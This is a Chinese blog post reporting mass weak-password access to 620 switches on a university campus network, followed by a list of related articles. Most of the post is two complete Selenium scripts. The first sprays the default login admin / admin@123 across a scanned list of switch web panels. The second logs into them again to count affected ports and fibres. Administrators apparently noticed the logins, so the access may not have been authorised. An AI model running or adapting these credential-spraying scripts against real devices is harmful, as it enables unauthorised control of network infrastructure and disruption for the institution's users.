某大学某校区大范围交换机弱口令调查报告

最新推荐文章于 2021-05-26 14:07:02 发布
最新推荐文章于 2021-05-26 14:07:02 发布
阅读量1.6k 收藏
点赞数 1
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a709046532/article/details/114259460
版权

1. 前言

在某次例行的测试中发现某交换机存在弱口令,进行横向测试时发现影响范围较广,遂有此报告。本次受影响的交换机有 620 台,涉及主机 4362 台,光缆 865 条。对学校整体具有较大的威胁性


2. 探测过程

对校内 10 段内网地址进行大规模扫描发现有 1124 个交换机的相关接口
在这里插入图片描述
在进行弱口令的尝试过程中发现 admin admin@123 可以成功登陆,且拥有对交换机整体的控制权
在这里插入图片描述
基于横向渗透的思想,我们对上述得到的交换机地址都用这个账号密码进行爆破


由于在写爆破脚本的时候ssl连接一直会出现问题。最后不得不放弃了requests直接发包的方式,而是使用了selenium来帮助我们完成工作


最后我们的脚本如下:

from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver import ActionChains
from selenium.webdriver.support.select import Select
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from lxml import etree
import time
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.chrome.options import Options
from queue import Queue
import threading



options = webdriver.ChromeOptions()
options.add_argument('--ignore-certificate-errors')

with open(r"C:\Users\shinelon\Desktop\summary.txt",encoding="UTF-8") as f:
    urls= f.read().splitlines()

q = Queue(maxsize=0)
for each in urls:
    q.put(each)

def try_vuln(browser):
    while True:
        if q.empty():
            break
        url = q.get()
        url = url.split()[3]
        try:
            browser.get(url)#打开浏览器预设网址
            time.sleep(1)
            if "/simple/view/login.html" in browser.current_url:
                print("Find: "+ browser.current_url)
            else:
                continue

            time.sleep(3)
            result = alert_is_present()(browser)
            if result:
                result.accept()

            locator = (By.ID, 'UserName')
            WebDriverWait(browser, 30, 1).until(EC.presence_of_element_located(locator))
            time.sleep(0.5)

            locator = (By.ID, 'userPassword')
            WebDriverWait(browser, 30, 1).until(EC.presence_of_element_located(locator))
            time.sleep(0.5)

            locator = (By.ID, 'goBtn')
            WebDriverWait(browser, 30, 1).until(EC.presence_of_element_located(locator))
            time.sleep(0.5)

            browser.find_element_by_id("UserName").send_keys("admin")
            # 输入密码
            browser.find_element_by_id("userPassword").send_keys("admin@123")

            browser.find_element_by_id("goBtn").click()

            time.sleep(3)
            data = browser.page_source

            if "LSW" in browser.title:
                print("Success :" + url)
        except:
            pass


def scan_all():
    for index in range(1):
        browser=webdriver.Chrome(options=options)
        th = threading.Thread(target=try_vuln,args=(browser,))
        th.start()


class alert_is_present(object):
    """ Expect an alert to be present."""

    """判断当前页面的alert弹窗"""
    def __init__(self):
        pass

    def __call__(self, driver):
        try:
            alert = driver.switch_to.alert
            return alert
        except Exception:
            return False

if __name__ == '__main__':
    scan_all()

最后,我们得到了如下的结果:

在这里插入图片描述

之后对脚本进行改动,对这些交换机进行详细信息的记录,估计影响范围

from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver import ActionChains
from selenium.webdriver.support.select import Select
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from lxml import etree
import time
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.chrome.options import Options
from queue import Queue
import threading
from lxml import etree


fiber_count = 0
port_count = 0

options = webdriver.ChromeOptions()
options.add_argument('--ignore-certificate-errors')

with open(r"C:\Users\shinelon\Desktop\tmp\switch_vuln_total.txt",encoding="UTF-8") as f:
    urls= f.read().splitlines()

q = Queue(maxsize=0)
for each in urls:
    q.put(each)

def try_vuln(browser):
    global fiber_count
    global port_count
    while True:
        if q.empty():
            break
        url = q.get()
        try:
            browser.get(url)#打开浏览器预设网址
            time.sleep(2)
            result = alert_is_present()(browser)
            if result:
                print("found tanchuang and click!")
                result.accept()

            locator = (By.ID, 'UserName')
            WebDriverWait(browser, 30, 1).until(EC.presence_of_element_located(locator))
            locator = (By.ID, 'userPassword')
            WebDriverWait(browser, 30, 1).until(EC.presence_of_element_located(locator))
            locator = (By.ID, 'goBtn')
            WebDriverWait(browser, 30, 1).until(EC.presence_of_element_located(locator))

            browser.find_element_by_id("UserName").send_keys("admin")
            time.sleep(0.5)
            # 输入密码
            browser.find_element_by_id("userPassword").send_keys("admin@123")
            time.sleep(0.5)
            browser.find_element_by_id("goBtn").click()
            time.sleep(15)
            data = browser.page_source
            html = etree.HTML(data)
            html_data = html.xpath('//table[@class="portPanelTable"]//img/@src')
            for each in html_data:
                count1 = each.find("fiber_green")
                count2 = each.find("port_green")
                if count1!=-1:
                    fiber_count +=1
                if count2!=-1:
                    port_count +=1

            print("The current affected port is " + str(port_count))
            print("The current affected fiber is " + str(fiber_count))
        except:
            pass


def scan_all():
    for index in range(8):
        browser=webdriver.Chrome(options=options)
        th = threading.Thread(target=try_vuln,args=(browser,))
        th.start()


class alert_is_present(object):
    """ Expect an alert to be present."""

    """判断当前页面的alert弹窗"""
    def __init__(self):
        pass

    def __call__(self, driver):
        try:
            alert = driver.switch_to.alert
            return alert
        except Exception:
            return False

if __name__ == '__main__':
    scan_all()

运行结果如下:

在这里插入图片描述

可以看出受影响的主机为 4362 台,总共接入光纤有 865 条。算是一个比较严重的结果。


3. 后记

在对数据进行统计的过程中发现有些交换机的密码被改了,应该是管理员发现登录的 IP异常并做了相应的修改口令的操作。

即上述统计出来的数据涉及到的交换机数应少于620 台。若是发现当时就进行统计结果只会更加惊人。

一开始的 1124 条交换机记录是通过大规模的内网探测抓取出来的。对大范围的内网进行探测所带来的弊端就是为了效率可能需要牺牲一些精确度。也就是存在少部分的带有弱口令的交换机没有被扫出来。

4.总结

在进行SRC挖掘和渗透测试的过程中,当挖到一个特定的漏洞时可以尝试对其进行横向拓展。往往会有意想不到的惊喜

h1nt
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Linux——系统安全及应用(弱口令检测、端口扫描)
ML908的博客
11-15 1089
基本安全措施 系统账号清理 将非登陆用户的Shell设为/sbin/nologin,表示禁止中断登陆,确保不被人为改动 在系统中,除了手动创建的各种账号之外,还包括随系统或程序安装过程而生成的其他大量账号。除了root之外,其他大量账号只是用来维护系统运作、启动或保持服务进程,一般是不允许登陆的,因此也称为非登陆用户 [root@localhost ~]# grep "/sbin/nologi...
golang 对rdp的弱口令测试_某大学渗透测试实战靶场报告Part2
weixin_42361026的博客
12-06 1495
点击上方“蓝字”关注公众号获取最新信息!本文作者:久久久久久久、欧根亲王号、森浩、3had0w(贝塔安全实验室-核心成员)一、192.168.3.X段的信息搜集(1) 192.168.3.x段存活主机信息使用以前自己改的一个domain.bat批处理脚本或K8哥哥的Ladon得到192.168.3.x段存活主机如下,Ladon项目地址:https://github.com/k8gege/...
利用数据库漏洞扫描评估数据库安全性 4 弱口令扫描
weixin_34132768的博客
01-11 197
在前面,游侠给大家介绍了数据库漏洞扫描的一些知识,并且发起了一次针对Oracle数据库的“授权扫描”,现在我们进行一次“弱口令扫描”,因为弱口令实在是数据库几乎最大的威胁,所以,在数据库漏洞扫描中专列了“弱口令扫描”。本项的目标依然是Oracle数据库。 发起扫描的方式如前面文章所言,在任务上鼠标右键“弱口令扫描” 数据库漏洞扫描会列出任务包含的数据库服务器地址,填入...
系统和应用弱口令原因分析
qq_40770143的博客
10-26 2255
首先准备一台linux系统,然后安装工具nali (nali下载地址) 1、Linux系统排查步骤 1)#cat messages*|grep sshd|grep Acc|awk ‘{print $9,$11}’|sort|uniq -c|nali 2)#cat sshd.log |grep Failed|awk ‘{print $9,$11}’|sort|uniq -c|nali 3)查看是否有...
看完你敢弱口令
weixin_34248023的博客
11-18 101
加固网络安全是网络管理人员的重要工作,口令满足复杂性是最基本的要求,但很多管理员对弱口令嗤之以鼻,认为没什么大不了?不见棺材不掉泪,一步一步直捣黄龙…… 实验环境:vm6.51(windows2003+winxp),如图: 第一招:扫你没商量 工具:x-scan-v3.3,在winxp上打开xcan,设置|扫描参数,输...
弱口令攻击
03-11
使用网络安全扫描工具X-Scan进行安全扫描,破解本地用户名、口令以及远程用户名、口令的方法。
SAN交换机(brocade)解决弱口令.docx
01-29
OEM博科SAN交换机弱口令
合肥工业大学宣城校区2019级传感器实验报告
08-03
这篇文档是关于合肥工业大学宣城校区2019级学生进行的传感器实验报告,主要涵盖了两个实验:应变式电阻传感器的半桥性能测试和金属箔式应变片的全桥性能测试。实验报告详细记录了实验目的、原理、步骤、结果分析以及...
广州某大学校区智慧校园建设方案.docx
06-16
广州某大学校区智慧校园建设方案
合肥工业大学 计算机组成原理实验 实验报告 计算机科学与技术 宣城校区
06-14
合肥工业大学 计算机组成原理实验 实验报告 计算机科学与技术 宣城校区 HFUT 2022 实验一 Vivado环境下组合电路的设计与仿真 1.Led灯的控制电路 (1).给关键代码添加注释,或者给出模块代码的流程图。 (2).编程与...
弱口令校验设计
12-25
弱口令校验的设计思路和一个java的实现类
基于Vue的电子科技大学清水河校区入校码设计源码
05-25
本源码为基于Vue的电子科技大学清水河校区入校码设计,包含15个SVG文件、10个Vue文件等,共50个文件。该项目旨在为用户提供一个全面、便捷的电子科技大学清水河校区入校码解决方案,通过Vue、JavaScript、HTML技术的...
大学校区智慧校园软件系统集成方案.doc
06-21
【大学校区智慧校园软件系统集成方案】 智慧校园的建设旨在利用现代信息技术,提升教育质量和管理水平,为师生提供便捷、高效的教学、科研和生活环境。本方案详细阐述了大学校区智慧校园软件系统的集成策略,旨在...
详解通过Mysql弱口令得到系统权限
asli33的专栏
03-16 1576
<br />来源:http://www.sai52.com/archives/722/<br /> <br />很早网上就有了用mysql弱口令得到webshell教程,但是这次我要说的不是得到webshell,而是直接得到系统权限,看清楚了,是“直接”得到!<br /> <br />首先,我简单说一下mysql弱口令得到系统权限得过程:首先利用mysql脚本上传udf dll文件,然后利用注册UDF DLL中自写的Function函数,而执行任意命令。<br /><br /> 思路很简单,网上也有一些教
Linux系统弱口令检测和网络端口扫描
weixin_53496421的博客
02-22 2897
文章标题系统弱口令检测操作步骤 系统弱口令检测 Joth the Ripper,简称JR 一款开源的密码分析工具,支持字典式的暴力破解 通过对shadow文件的口令分析,可以检测密码强度 官方网站:http://www.openwall.com/john/ 操作步骤 cd /opt tar zxvf john-1.9.0.tar.gz #解压工具包 yum -y install gcc gcc-c++ make
举例说明一下常见的弱口令_常见网站入侵手段及防御方法
weixin_39523280的博客
11-27 1467
上传入侵上传入侵便是通过上传文件来获得权限,针对有上传文件权限的网站实施,好比论坛可以上传附件、资讯站可以投稿上传图片,这些都可能为上传木马提供便利,上传木马以后,很多信息都会轻松暴露出来的。这个漏洞在网站源码中比较常见,被黑客们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级超级高。防御方法:第三方开源代码要及时升级官方提供的程序补丁;注意对上传的文件进行限制,例如限制文件类型...
渗透测试常见弱口令汇总
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-26 2322
常见网络安全设备弱口令(默认口令) 设备 默认账号 默认密码 深信服产品 sangfor sangfor sangfor@2018 sangfor@2019 深信服科技 AD dlanrecover 深信服负载均衡 AD 3.6 admin admin 深信服WAC ( WNS V2.6) admin admin 深信服VPN Admin Admin 深信服ipsec-VPN (SSL 5.5) Ad.
弱口令验证方案设计
liulanggoood的专栏
12-25 680
1.1    弱口令设计思路 1.1.1    基本校验 弱口令的基本校验包括:口令字符串长度校验、口令字符串包含的字符类型校验、口令字符串包含的不同字符数校验。 口令字符串长度校验:验证口令字符串的长度不能低于规定值(如6)。 口令字符串包含的字符类型校验:把字符类型分为大写字母、小写字母、数组、特殊字符四类,校验口令字符串包含的字符类型不能低于规定值(如2)。 口令字符串包含的不同字...
[高分项目]基于vue,springboot的图书馆管理系统[源码+笔记+操作手册+说明文档].zip
最新发布
07-25
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、MATLAB、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、MATLAB、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、MATLAB、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、MATLAB、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、MATLAB、python、web、C#、EDA、proteus、RTOS等项目的源码。 【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。 【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。【项目资源
广州某大学校区智慧校园建设策略
"广州某大学校区智慧校园建设方案旨在构建一个先进的教育信息化体系,以满足21世纪教育现代化的需求。方案依据国家教育信息化政策,旨在通过宽带网络全面覆盖、优质教育资源共享、网络学习空间普及等方式提升教育...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

h1nt

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值